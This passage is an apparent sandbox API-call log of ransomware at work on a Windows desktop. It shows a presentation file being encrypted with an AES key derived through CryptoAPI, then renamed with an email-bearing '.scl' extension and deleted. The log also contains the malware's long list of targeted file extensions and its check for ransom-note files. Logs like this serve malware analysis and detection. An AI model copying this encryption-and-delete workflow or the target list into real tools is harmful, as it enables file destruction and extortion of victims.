mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".pptx") returned=".pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0181.521] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0181.521] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0181.521] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0181.524] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0xeba3, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0xeba3, lpOverlapped=0x0) returned 1
	[0181.527] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.527] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcaef0) returned 1
	[0181.529] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.529] CryptCreateHash (in: hProv=0xfcaef0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0181.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.530] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0181.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.530] CryptDeriveKey (in: hProv=0xfcaef0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0181.530] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.530] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0xeba3, dwBufLen=0xeba3 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0xebb0) returned 1
	[0181.533] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.534] RtlMoveMemory (in: Destination=0xfebd30, Source=0xfdd180, Length=0xeba3 | out: Destination=0xfebd30) 
	[0181.534] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.534] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfebd30*, pdwDataLen=0x18bc0c*=0xeba3, dwBufLen=0xebb0 | out: pbData=0xfebd30*, pdwDataLen=0x18bc0c*=0xebb0) returned 1
	[0181.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.536] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0181.536] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.537] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0181.537] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.537] CryptReleaseContext (hProv=0xfcaef0, dwFlags=0x0) returned 1
	[0181.537] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.537] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0181.538] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0181.538] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0181.539] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 86
	[0181.539] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0181.539] WriteFile (in: hFile=0x388, lpBuffer=0xfebd30*, nNumberOfBytesToWrite=0xebb0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfebd30*, lpNumberOfBytesWritten=0x18c068*=0xebb0, lpOverlapped=0x0) returned 1
	[0181.544] CloseHandle (hObject=0x388) returned 1
	[0181.545] CloseHandle (hObject=0x384) returned 1
	[0181.545] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx")) returned 1
	[0181.601] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d-efjesby.pptx")) returned 0
	[0181.602] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x435fd682, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x435fd682, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1
	[0181.602] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1
	[0181.602] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1
	[0181.602] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.602] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini"
	[0181.602] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini") returned 41
	[0181.602] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.602] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\desktop.ini", cchLength=0x29 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini") returned 0x29
	[0181.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.603] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.603] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini") returned="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini"
	[0181.603] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\desktop.ini") returned 41
	[0181.603] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.603] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.603] StrStrW (lpFirst=".ini", lpSrch=".") returned=".ini"
	[0181.604] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.604] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".ini") returned 0x0
	[0181.604] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf46dfd20, ftCreationTime.dwHighDateTime=0x1d969e0, ftLastAccessTime.dwLowDateTime=0xe4cc4940, ftLastAccessTime.dwHighDateTime=0x1d96af7, ftLastWriteTime.dwLowDateTime=0xe4cc4940, ftLastWriteTime.dwHighDateTime=0x1d96af7, nFileSizeHigh=0x0, nFileSizeLow=0x15f97, dwReserved0=0x0, dwReserved1=0x0, cFileName="DGlt_u_s.wav", cAlternateFileName="")) returned 1
	[0181.604] lstrcmpW (lpString1="DGlt_u_s.wav", lpString2="..") returned 1
	[0181.604] lstrcmpW (lpString1="DGlt_u_s.wav", lpString2=".") returned 1
	[0181.604] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	[0181.604] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\", lpString2="DGlt_u_s.wav" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\DGlt_u_s.wav") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\DGlt_u_s.wav"
	[0181.604] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\DGlt_u_s.wav") returned 42
	[0181.605] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0181.605] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\DGlt_u_s.wav", cchLength=0x2a | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav") returned 0x2a
	[0181.605] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.605] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav", lpSrch="help_decrypt_your_files") returned 0x0
	[0181.605] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav") returned="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav"
	[0181.605] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\dglt_u_s.wav") returned 42
	[0181.605] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0181.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.606] StrStrW (lpFirst=".wav", lpSrch=".") returned=".wav"
	[0181.606] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0181.606] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dc